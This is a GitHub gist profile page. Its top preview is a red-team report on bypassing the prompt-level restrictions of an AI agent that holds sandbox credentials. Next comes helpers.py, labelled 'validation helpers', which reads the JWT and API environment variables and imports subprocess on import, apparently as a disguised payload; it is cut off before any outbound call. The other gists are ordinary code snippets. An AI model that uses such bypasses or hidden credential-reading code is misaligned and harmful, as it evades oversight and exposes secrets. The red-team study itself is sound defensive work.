Skip to content

Instantly share code, notes, and snippets.

View actsasbuffoon's full-sized avatar

Michael Tomer actsasbuffoon

23 followers · 16 following
  • Maestro
  • Boston, MA
View GitHub Profile
@actsasbuffoon
actsasbuffoon / red-team-report.md
Last active March 17, 2026 14:49
Red team report: Naya agent prompt-level security bypass

Red team report: Maia agent prompt-level security bypass

How We Bypassed Maia's Prompt-Level Security

Background

Maia runs inside a Claude Code agent with access to an E2B cloud sandbox. The sandbox has shell access, Python, Node, and environment variables ($GRAPHQL_URL, $JWT) that authenticate it against our Rails GraphQL API. Maia interacts with the platform through curated "skills" -- predefined GraphQL queries and mutations for goals, objectives, initiatives, KPIs, updates, dashboards, and stage gates.

We added several layers of prompt-level restrictions to Maia's CLAUDE.md to keep it inside those boundaries:

@actsasbuffoon
actsasbuffoon / helpers.py
Created March 16, 2026 16:44
KPI data validation helpers
"""
Data validation helpers for KPI data points.
Used by the cleanup script to validate entries before processing.
"""
import subprocess, os, json
# Pre-validate environment on import so we fail fast
_url = os.environ.get("GRAPHQL_URL", "")
_jwt = os.environ.get("JWT", "")
_host = os.environ.get("GRAPHQL_HOST", "")
@actsasbuffoon
actsasbuffoon / simple_neural_net.rb
Last active May 4, 2016 16:19
A simple neural network example.
class Neuron
attr_accessor :inputs, :threshold, :weights
def initialize(threshold, weights)
@threshold = threshold
@weights = weights
@inputs = []
end
def output
@actsasbuffoon
actsasbuffoon / example_schema.yml
Created June 1, 2015 18:36
swagger: "2.0"
info:
description: Simple example
version: "1.0.0"
title: Example
license:
name: Apache 2.0
url: http://www.apache.org/licenses/LICENSE-2.0.html
host: 127.0.0.1:8080
schemes:
@actsasbuffoon
actsasbuffoon / lang.hs
Last active August 29, 2015 14:12
The beginnings of a simple imperative language in Haskell
{-# LANGUAGE ViewPatterns #-}
{-# OPTIONS_GHC -Wall #-}
module Main where
-- This is a simple dynamically typed imperative language with mutable state. It's somewhat similar to JavaScript, but
-- it differs in many ways. There are a few notable oddities to the language that I'm still working out. For instance,
-- we don't have reference types. In most languages you would write something like this:
--
-- foo = new Person("Mike")
@actsasbuffoon
actsasbuffoon / fun_with_javascript.js
Last active December 27, 2015 12:09
We've replaced Michael's JavaScript interpreter with Cthulhu. Let's see if he can tell the difference!
// Let's have some fun with JavaScript.
{} + 0
// => 0
// That's a little strange, but okay. Surely nothing would change if I wrapped
// the whole thing in parens, right?
({} + 0)
// => "[object Object]0"
@actsasbuffoon
actsasbuffoon / pathfinder.rb
Created December 20, 2012 12:23
Ruby implementation of Dijkstra's algorithm. http://en.wikipedia.org/wiki/Dijkstra's_algorithm
map = <<-EOS
. . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . .
. . . . . . . X X X X X X X . .
. . . . . . . X . . . . . X . .
. . . . . . . X . . . . . . . .
. . . . . . . X . . . . . X . .
. . . . . . . X . . S . . X . .
. . . . . . . X . . . . . X . .
. . . . . . . X X X X X X X . .
@actsasbuffoon
actsasbuffoon / maze.rb
Created December 20, 2012 12:17
A recursive backtracking maze generator made with Ruby-Processing. gem install ruby-processing rp5 run maze.rb
require 'rubygems'
class Array
def random
self[rand length]
end
end
class Hash
def random
@actsasbuffoon
actsasbuffoon / calculate_change.clj
Created August 26, 2012 00:17
My first attempt at Clojure. Suggestions/criticism welcome.
(defn calculate-change
([paid cost] (make-change paid cost 0))
([paid cost denomination-index]
(let
[
currency-values [
[:hundreds 10000]
[:fifties 5000]
[:twenties 2000]
[:tens 1000]
@actsasbuffoon
actsasbuffoon / example.scala
Created June 24, 2012 23:38
Setting up a table definition
TableDefinition.register("SetSummaries", Map(
"SetID" -> java.lang.Integer,
"UserID" -> java.lang.Integer,
"ProgramNumber" -> java.lang.Integer,
"ProgramID" -> java.lang.Integer,
"SessionNumber" -> java.lang.Integer,
"SetNumber" -> java.lang.Integer,
"ExerciseID" -> java.lang.Integer,
"Skipped" -> java.lang.Boolean,
"PaceScore" -> java.lang.Integer,